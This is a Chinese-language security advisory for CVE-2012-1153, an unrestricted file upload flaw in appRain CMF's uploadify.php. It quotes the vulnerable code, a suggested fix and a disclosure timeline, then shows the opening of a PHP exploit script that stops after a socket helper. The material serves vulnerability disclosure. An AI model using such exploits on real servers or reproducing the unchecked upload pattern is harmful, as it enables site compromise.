appRain CMF 'uploadify.php'远程任意文件上传漏洞

发布日期：2012-01-19
更新日期：2012-10-16

受影响系统：
appRain appRain CMF 0.1.5
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51576
CVE ID: CVE-2012-1153

appRain CMF是开源内容管理框架。

appRain CMF 0.1.5及其他版本存在任意文件上传漏洞，成功利用后可允许攻击者上传任意文件到受影响服务器。

<*来源：EgiX （n0b0d13s@gmail.com）
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

/*
    ---------------------------------------------------------------------
    appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
    ---------------------------------------------------------------------
   
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....:
   
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
   
    [-] vulnerable code in /webroot/addons/uploadify/uploadify.php
   
    27.    if (!empty($_FILES)) {
    28.            $tempFile = $_FILES['Filedata']['tmp_name'];
    29.            //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    30.            $targetFile =  "uploads/" . $_FILES['Filedata']['name'];
    31.           
    32.            // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    33.            // $fileTypes  = str_replace(';','|',$fileTypes);
    34.            // $typesArray = split('\|',$fileTypes);
    35.            // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    36.           
    37.            // if (in_array($fileParts['extension'],$typesArray)) {
    38.                    // Uncomment the following line if you want to make the directory if it doesn't exist
    39.                    // mkdir(str_replace('//','/',$targetPath), 0755, true);
    40.                   
    41.                    move_uploaded_file($tempFile,$targetFile);
    42.                    echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    43.            // } else {
    44.            //      echo 'Invalid file type.';
    45.            // }
    46.    }
   
    Restricted access to  this script isn't properly realized,  so an attacker might  be able to upload
    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
   
    [-] Possible bug fix:
   
    include_once('../../../app.php');
    App::__Obj('appRain_Base_Core')->check_admin_login();
   
    add this lines of code at the beginning of the script
   
    [-] Disclosure timeline:
   
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Issue reported to
    [20/12/2011] - Vendor response and fix suggested
    [16/01/2012] - After four weeks still no fix released
    [19/01/2012] - Public disclosure
   
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");

fputs($sock, $packet);
    return stream_get_contents($sock);
}